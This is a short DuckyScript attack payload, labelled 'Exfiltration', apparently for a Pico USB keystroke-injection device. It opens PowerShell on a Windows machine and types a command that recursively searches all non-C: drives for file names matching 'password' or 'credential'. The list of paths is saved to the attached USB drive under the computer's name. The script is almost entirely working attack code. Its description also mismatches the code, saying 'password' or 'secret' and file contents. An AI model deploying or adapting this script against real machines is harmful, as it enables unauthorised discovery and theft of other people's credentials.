1
REM Title:			Secret File List
2
REM Description:	This will list all files that contain the words "password" or "secret", excluding those from the C: drive. You can replace these keywords with your own search terms.
3
REM Author:			ih-hira
4
REM Target: 		Windows
5
REM Version: 		1.0
6
REM Category: 		Exfiltration
7

8
REM Define the drive label where you want to save the file. The default label is DUCKY. Rename your Pico drive to DUCKY for it to work properly. (optional)
9
DEFINE #DRIVE_LABEL DUCKY
10

11
REM Define your search term here. To search for multiple terms, separate them with a pipe (|).
12
DEFINE #SEARCH_TERM password|credential
13

14
ATTACKMODE HID STORAGE
15

16
DELAY 500
17
GUI r
18

19
DELAY 300
20
STRINGLN powershell
21

22
DELAY 1000
23
STRINGLN $m=(Get-Volume -FileSystemLabel #DRIVE_LABEL).DriveLetter; Get-PSDrive -PSProvider FileSystem | Where-Object Name -ne 'C' | ForEach-Object { Get-ChildItem ($_.Name + ':\') -Recurse -ErrorAction SilentlyContinue | Where-Object { $_.Name -match '#SEARCH_TERM' } | Select-Object -ExpandProperty FullName }>>$m':\'$env:computername'.txt'
24
STRINGLN exit
25

26
REM The drive letter of the volume labeled "DUCKY" is stored in the variable $m. You can change this by defining DRIVE_LABEL.
27
REM It will take time, as it scans all the drives.
28
REM Keep in mind that the DUCKY drive has limited memory; if the file size exceeds the drive capacity, the file will not be saved.
29
REM The results of the command will be redirected (saved) to a file on the root of the "DUCKY" drive, saved as the computer name (in .txt format).
30